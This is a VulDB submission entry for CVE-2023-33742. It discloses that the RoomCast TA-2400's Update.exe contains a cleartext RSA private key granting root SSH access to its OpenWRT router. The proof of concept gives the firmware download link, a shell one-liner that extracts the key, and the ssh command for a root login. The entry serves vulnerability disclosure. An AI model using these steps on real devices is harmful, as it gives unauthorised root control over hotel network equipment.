| Titolo | RoomCast TA-2400 - CVE—2023-33742 - Cleartext Storage of Sensitive Information in Executable |
|---|
| Descrizione |
CVE—2023-33742: CLEARTEXT STORAGE OF SENSITIVE INFORMATION IN EXECUTABLE in UPDATE.EXE in TELEADAPT ROOMCAST TA-2400 1.0.0 AND LATER allows REMOTE ATTACKERS to GET ROOT SHELL via SSH AUTHENTICATION
Vulnerability Type: CWE-318: Cleartext Storage of Sensitive Information in Executable
Vulnerability Description: The Update.exe file exposes the RSA private key used for authentication with the OpenWRT node. This unencrypted RSA private key can be extracted from the Update.exe file, enabling an unauthorised individual to establish a root-level SSH connection with the OpenWRT node.
Device: RoomCast TA-2400
Software: Update.exe
RoomCast Component: OpenWRT Router
CVSS Base Score: Critical Risk - 9.6
CVSS Temporal Score: Critical Risk - 9.1
CVSS v3.1 Vector: AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:W/RC:C
Proof of Concept
In this section, we present a detailed proof of concept (PoC) to illustrate the identified vulnerability within the RoomCast TA-2400 device. The PoC provides step-by-step instructions for identifying the vulnerability and successfully exploiting it. It is important to note that for testing the PoC, we recommend using a Linux-based environment, which offers the necessary tools and compatibility for conducting the tests accurately and reliably.
1. Download the latest OpenWRT firmware package from the RoomCast support page.
Support Portal: https://rc.teleadapt.com
Download: https://rc.teleadapt.com/roomcast/production/releases/r3.00/router_firmware_170622.zip
2. Open the firmware archive that was previously downloaded and locate the update.exe file.
3. Extract the RSA private key from the update.exe executable and save it to a local private key file. Navigate to the location of the update.exe file from step 1 and 2 and run the following. Command: strings update.exe | sed -n "$(strings update.exe | grep -n -e "BEGIN RSA PRIVATE KEY" | cut -d : -f 1), $(strings update.exe | grep -n -e "END RSA PRIVATE KEY" | cut -d : -f 1)p" | sed "s/--t/--/g" > rsa_key.pem
4. Change the permissions of the newly saved rsa_key.pem file so it can work with the ssh command.
Command: sudo chmod 400 rsa_key.pem
5. Establish an SSH connection with the OpenWRT node. Run the following command while being in the same directory as the created rsa_key.pem file.
Command: sudo ssh -o KexAlgorithms=diffie-hellman-group1-sha1 -o HostKeyAlgorithms=ssh-rsa -o PubkeyAcceptedKeyTypes=ssh-rsa -i rsa_key.pem [email protected]
If this is your first time connecting to the OpenWRT node you will need to confirm this as a verified host. You should now have a terminal session on the OpenWRT node as root user. This is a complete compromise of the OpenWRT node, providing unrestricted control over its operations and configurations.
|
|---|
| Fonte | ⚠️ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33742 |
|---|
| Utente | jTag Labs (UID 51246) |
|---|
| Sottomissione | 21/07/2023 03:04 (3 anni fa) |
|---|
| Moderazione | 28/07/2023 07:09 (7 days later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 235618 [TeleAdapt RoomCast TA-2400 fino a 3.1 RSA Private Key Update.exe rivelazione di informazioni] |
|---|
| Punti | 20 |
|---|